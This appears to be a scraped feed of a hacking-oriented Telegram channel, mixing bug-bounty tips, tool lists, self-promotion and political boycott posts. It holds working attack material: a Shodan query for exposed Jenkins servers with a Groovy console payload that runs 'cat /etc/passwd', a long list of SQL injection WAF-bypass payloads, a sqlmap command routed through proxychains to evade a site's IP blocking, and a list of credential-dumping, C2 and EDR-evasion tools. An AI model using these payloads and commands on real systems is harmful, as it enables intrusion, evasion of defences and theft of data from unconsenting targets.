Exploit RCE via Groovy Console
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
Shodan: ssl.cert.subject.cn:*.taarget.com http.title:"Dashboard [Jenkins]"
Payload: println "cat /etc/passwd".execute().text
hashtag#BugBounty hashtag#bugbountytips hashtag#RCE
👍25🔥7❤2
hello everyone use this my custom and advance Recon Eging
https://haxshadow.github.io/reconengine/
https://haxshadow.github.io/reconengine/
6🔥39❤6👍3🫡3🥰1
Bypass SQL union select
#Bypass #SQL
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
#Bypass #SQL
❤16👍6
Master Wordpress Penetration Testing.pdf
6 MB
🔍 Master WordPress Penetration Testing – Secure & Exploit Like a Pro! 💻🚀
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
🔹 Learn How to Identify & Exploit WordPress Vulnerabilities! ⚡️
🔹 Master Enumeration, Brute-Force Attacks, Plugin Exploits & More! 🔥
🔹 Understand WordPress Security Best Practices & Hardening Techniques! 🎯
🔹 Essential for Ethical Hackers, Bug Bounty Hunters & Pentesters! 🛠
📖 Expand Your Pentesting Skills!
👉 Complete List of Pentesting & Hacking Tools: https://www.codelivly.com/complete-list-of-penetration-testing-and-hacking-tools
👉 Learn Web Application Pentesting: https://www.codelivly.com/learn-web-app-pentesting/
👉 Hacking Like a Pro – Penetration Testing with Kali Linux: https://www.codelivly.com/hacking-like-a-pro-the-ultimate-guide-to-penetration-testing-with-kali-linux-tools/
🚀 Test Smarter, Hack WordPress & Stay Ahead in Cybersecurity!
❤19👍5
HackTheBox Certified Penetration Tester Specialist Cheatsheet
https://github.com/zagnox/CPTS-cheatsheet
https://github.com/zagnox/CPTS-cheatsheet
GitHub
GitHub - zagnox/CPTS-cheatsheet: HackTheBox Certified Penetration Tester Specialist Cheatsheet
HackTheBox Certified Penetration Tester Specialist Cheatsheet - zagnox/CPTS-cheatsheet
❤13🔥4
ModSecurity WAF are so easy to Bypass !
i used proxychains bcz site blocking my ip in just few attempt..
proxychains sqlmap -u 'url' --random-agent --batch --dbs --level 3 --tamper=between,space2comment --hex --delay 5
i used proxychains bcz site blocking my ip in just few attempt..
proxychains sqlmap -u 'url' --random-agent --batch --dbs --level 3 --tamper=between,space2comment --hex --delay 5
1👍29🤡5❤4🤮4💩2🥰1🍌1
XSS Hunting with Burp Suite: A Practical Guide:
https://youtu.be/qucdQ7kWHB4?si=fKT6tkTqyTTLKYv5
https://youtu.be/qucdQ7kWHB4?si=fKT6tkTqyTTLKYv5
YouTube
XSS Hunting with Burp Suite: A Practical Guide
🔍 XSS Hunting with Burp Suite: A Practical Guide
Are you ready to master Cross-Site Scripting (XSS) hunting? In this video, I’ll walk you through the step-by-step process of manually discovering XSS vulnerabilities using Burp Suite and how to automate the…
Are you ready to master Cross-Site Scripting (XSS) hunting? In this video, I’ll walk you through the step-by-step process of manually discovering XSS vulnerabilities using Burp Suite and how to automate the…
1👍21
𝐑𝐞𝐝 𝐓𝐞𝐚𝐦 𝐓𝐨𝐨𝐥𝐬 🔥
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
🔴 RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com
🔴 INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
🔴 DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
🔴 COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
🔴 CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
🔴 PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
🔴 DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
lnkd.in
LinkedIn
This link will take you to a page that’s not on LinkedIn
👍17🔥9❤7👎3💩2🍌1
🕊 Peace for Palestine
No more bloodshed. No more war.
We stand with the innocent lives affected by conflict.
Raise your voice for humanity, for justice, and for peace.
No War Please!!!
✊🏼💚❤️🤍
#PeaceForPalestine #FreePalestine #NoWar #StandForHumanity #StopTheViolence #SaveGaza #PrayForPalestine
No more bloodshed. No more war.
We stand with the innocent lives affected by conflict.
Raise your voice for humanity, for justice, and for peace.
No War Please!!!
✊🏼💚❤️🤍
#PeaceForPalestine #FreePalestine #NoWar #StandForHumanity #StopTheViolence #SaveGaza #PrayForPalestine
10❤86🕊16💩13🔥3🙏3💯2🤝1🗿1
It is not possible to damage a cyber power like Israel by taking down a couple of cyber attacks or useless websites.
So I would like to request everyone outside the tech field to boycott Israel completely both in the online world and offline. Through this, it is possible to break them financially. Stop using not only their online projects but also all their big services starting from online marketplaces. For example:
1. Fiverr
2. wix
3. Viber
4. Taboola
5. SimilarWeb
6. Vdoo
7. eToro
8. OutCrowd
9. Outbrain
10. Waze
We use many of these services and there are many more. We will completely refrain from using all these services from today.
So I would like to request everyone outside the tech field to boycott Israel completely both in the online world and offline. Through this, it is possible to break them financially. Stop using not only their online projects but also all their big services starting from online marketplaces. For example:
1. Fiverr
2. wix
3. Viber
4. Taboola
5. SimilarWeb
6. Vdoo
7. eToro
8. OutCrowd
9. Outbrain
10. Waze
We use many of these services and there are many more. We will completely refrain from using all these services from today.
❤20🤡10🔥9👍1👎1💯1
I new video upload go to my new telegram channel: https://t.iss.one/haxshadow
Title: Exposing Hidden API Keys with Web Scraping | Bug Bounty Recon Technique
Title: Exposing Hidden API Keys with Web Scraping | Bug Bounty Recon Technique
Telegram
HaxShadow
NO ONE HACK US !! JOIN US TO LEARN BUG BOUNTY
🔥9👍4
This is my Group add this
https://t.iss.one/shdowgp
https://t.iss.one/shdowgp
Telegram
Haxshadow👾 Chat
This is a Group ..
❤6👍1
I Upload my new video (Live Bug Bounty Recon on vmdconseil.co | Real-Time Vulnerability Hunting with Top Tools!)
https://t.iss.one/haxshadow
https://t.iss.one/haxshadow
Telegram
HaxShadow
NO ONE HACK US !! JOIN US TO LEARN BUG BOUNTY
👍8❤4🔥4
Coming very quickly to my channel.
I'm back after a long time, everyone please support and share more. visit: https://t.iss.one/haxshadow
I'm back after a long time, everyone please support and share more. visit: https://t.iss.one/haxshadow
30
I request everyone to please come to my new channel because if you tell me, I won't post much. It's a bit of a problem, so I request everyone.
visite: https://t.iss.one/haxshadow
visite: https://t.iss.one/haxshadow
Telegram
HaxShadow
NO ONE HACK US !! JOIN US TO LEARN BUG BOUNTY
1❤1
I upload thie new video
https://youtu.be/JlavbZMj6nM?si=U9mTl2F9OH3cUZ4w
https://youtu.be/JlavbZMj6nM?si=U9mTl2F9OH3cUZ4w
YouTube
Exposing the RDP Hacks You Didn't Know Existed
Get ready to uncover the hidden secrets of RDP hacking that bug bounty hunters and penetration testers don't want you to know. In this video, we're diving deep into the world of RDP hacking, Shodan search, and bug bounty recon techniques that will take your…
1❤5